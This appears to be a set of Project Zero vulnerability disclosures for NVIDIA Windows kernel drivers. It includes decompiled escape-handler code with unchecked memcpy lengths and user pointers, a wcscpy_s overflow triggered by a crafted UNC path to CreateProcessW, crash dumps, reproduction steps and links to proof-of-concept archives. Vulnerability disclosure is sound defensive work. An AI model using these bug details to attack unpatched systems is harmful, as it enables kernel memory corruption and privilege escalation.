CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0)
rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f
rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008
rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360
r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008
r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88
r14=ffffe001945f1201 r15=0000000000004000
iopl=0 nv up ei pl nz ac pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212
nvlddmkm+0x5dab00:
fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape),
and run.
For completeness, it looks like many of the other escape handlers in the same function has similar issues with writing to user provided pointers in an unchecked way. This should have been fairly obvious as the code is very close to each other in the same function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895
The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the
user provided lengths it receives. When these lengths are passed to memcpy,
overreads and memory corruption can occur.
void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data)
...
alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu);
...
alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu);
..
if ( (_BYTE)v11 ) {
memcpy(alloc_0, escape->buf_0, escape->size_0);
memcpy(alloc_1, escape->buf_2, escape->size_1);
}
v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96);
v9 = v8;
if ( !(_BYTE)v11 && !v8 )
memcpy(escape->buf_0, alloc_0, escape->size_0);
...
The PoC I've provided causes an OOB read, but it should be possible to pass an
input that results in the third memcpy being executed instead of the first two,
which leads to kernel memory corruption (OOB write).
(Win 10 x64 372.54) crashing context with PoC:
PAGE_FAULT_IN_NONPAGED_AREA (5)
...
Some register values may be zeroed or incorrect.
rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80
rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038
r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000
r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x5dad66:
fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894
The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the
destination for a memcpy call, without doing any checks on said pointer.
void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape)
{
...
v8 = escape->unknown_2;
if ( v8 == 1 )
{
data.size = escape->size;
data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu);
v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190);
}
...
else if ( escape->unknown_2 == 1 )
{
memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size);
(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141:
SYSTEM_SERVICE_EXCEPTION (3b)
...
CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0)
rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f
rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e
rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0
r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000
r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000
r14=ffffe0008fb2d000 r15=0000000000000001
iopl=0 nv up ei pl nz ac po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216
nvlddmkm+0x5dab00:
fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=918
The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
In this particular routine,
if ( cur->image_names_count > 0 ) {
// info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
image_filename = info_->ImageFileName;
buf = image_filename->Buffer;
if ( buf )
{
if ( !v5 )
{
i = 0i64;
num_chars = image_filename->Length / 2;
// Look for the filename by scanning for backslash.
if ( num_chars )
{
while ( buf[num_chars - (unsigned int)i - 1] != '\\' )
{
i = (unsigned int)(i + 1);
if ( (unsigned int)i >= num_chars )
goto LABEL_39;
}
buf += num_chars - (unsigned __int64)(unsigned int)i;
}
LABEL_39:
v26 = (unsigned int)i;
wcscpy_s((wchar_t *)Dst, i, buf);
Dst[v26] = 0;
wcslwr((wchar_t *)Dst);
v5 = 1;
wcscpy_s is used incorrectly here, as the second argument is not the size of
|Dst|, but rather the calculated size of the filename. |Dst| is a stack buffer
that is at least 255 characters long. The the maximum component paths of most
filesystems on Windows have a limit that is <= 255 though, so this shouldn't be
an issue on normal filesystems.
However, one can pass UNC paths to CreateProcessW containing forward slashes as
the path delimiter, which means that the extracted filename here can be
"a/b/c/...", leading to a buffer overflow. Additionally, this function has no
stack cookie.
e.g.
CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\..../..../..../blah.exe", ...
Crashing context with my PoC (Win 10 x64 with 372.54):
NvStreamKms+0x1c6a:
fffff801`5c791c6a c3 ret
kd> dqs rsp
ffffd000`25bc5d18 00410041`00410041
kd> t
...
KMODE_EXCEPTION_NOT_HANDLED (1e)
...
FAULTING_IP:
NvStreamKms+1c6a
fffff800`5b1d1c6a c3 ret
To reproduce, a WebDAV server is required (can be localhost), and the WebClient
service needs to be started (start can be triggered by user without additional privileges).
Then, run setup to create the long path to the target executable (you'll need to
change the base directories), and then run poc_part1, and then poc_part2 (with
the right UNC path) on the target machine.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40660.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936
The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size
input escape data, and relies on a user provided size as the upper bound for writing output.
Crashing context with PoC (Win 10 x64 with 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
...
rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8
r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620
r11=0000000000000450 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe nc
dxgkrnl!_report_gsfailure+0x5:
fffff801`f4152b75 cd29 int 29h
Resetting default scope
EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228)
ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip